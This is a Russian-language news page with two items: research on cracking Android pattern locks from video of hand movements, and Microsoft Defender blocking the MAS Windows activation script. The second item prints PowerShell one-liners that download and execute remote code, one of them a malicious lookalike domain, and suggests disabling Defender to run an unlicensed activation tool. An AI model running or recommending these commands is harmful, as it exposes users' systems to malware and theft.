Найден способ взломать графическую блокировку Android за 5 попыток

Найден способ взломать графическую блокировку Android за 5 попыток

Найден способ взломать графическую блокировку Android за 5 попыток

Британские математики разработали алгоритм, который позволяет взломать графическую блокировку на смартфонах с ОС Android всего за пять попыток, причем высокая сложность рисунка лишь облегчает работу хакера.

"Пароли-"узоры" являются самым популярным способом защиты Android-устройств от посторонних. Люди часто используют такие пароли для защиты важных финансовых операций, таких как покупки в онлайн-магазинах и управление счетами, так как они верят, что это безопасно. Мы показали, что на самом деле это очень ненадежная система", — заявил Чжэн Ван из университета Ланкастера (Великобритания).

Телефонная рулетка

Все современные смартфоны на базе ОС Android и многие другие "умные" телефоны по умолчанию используют простую систему защиты данных пользователя – узор из точек, которые пользователь должен обвести пальцем для разблокировки. Существует около 400 тысяч комбинаций из девяти точек, обычно выводящихся на экран, и ввод любых пяти неправильных сочетаний блокирует устройство, пишет ria.ru.

Поэтому, как рассказывает Ван, большинство пользователей считает подобную защиту достаточно надежной. Некоторые пользователи придумывают сложные сочетания точек для того, чтобы было труднее угадать или подобрать комбинацию.

На очередном cимпозиуме, посвященном сетевой безопасности, который будет проводиться в американском Сан-Диего в конце февраля, Ван и его коллеги представят методику, позволяющую подобрать графический ключ всего за пять попыток.

Для подобного взлома злоумышленнику необходим собственный телефон, камера и специальная программа, анализирующая в режиме реального времени то, что происходит перед объективом камеры.

К примеру, если будущая жертва заходит в кафе выпить кофе, "хакер" может сесть за любой столик по соседству, включить камеру и снять владельца телефона в момент разблокировки устройства. Ученые пояснили, что злоумышленнику не нужно "подглядывать" в экран чужого смартфона, достаточно направить камеру, сидя сбоку или прямо перед владельцем телефона на расстоянии в 5-9 метров и не вызывая подозрений.

Ловкость рук

Программа, анализирующая видеоролик ввода пароля, следит за движением рук, ей не нужно видеть экран, чтобы вычислить, какие узоры чертит пользователь. Длинные и сложные комбинации линий только облегчают задачу алгоритму, так как у него остается меньше возможных вариантов при увеличении числа компонентов в пароле.

Как показали эксперименты в настоящем кафе, программа Вана и его коллег распознает около 95% графических ключей всего с пяти попыток, причем 87% сложных паролей она угадывает с первого раза и только 40% легких комбинаций не удается вычислить сразу.

Подобные методики взлома, как считают ученые, могут поступить на вооружение спецслужб и дать возможность силам правопорядка узнавать пароли интересующих их лиц. Достаточно инсценировать кражу телефона, чтобы извлечь из него ценную информацию. Вдобавок службы могут таким же образом быстро устанавливать "трояны" и шпионские программы в момент, когда владелец телефона вышел в туалет или отвлекся.

Как можно защититься от такого взлома? Самый простой способ – использовать иной метод ввода пароля, к примеру, рукописный ввод нескольких слов, считает Ван. Другой простой метод – закрыть пальцы второй рукой в момент разблокировки смартфона. Конечно, ни один из вариантов не гарантирует абсолютной защиты, поэтому следует быть готовым к тому, что данные "утекут".

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru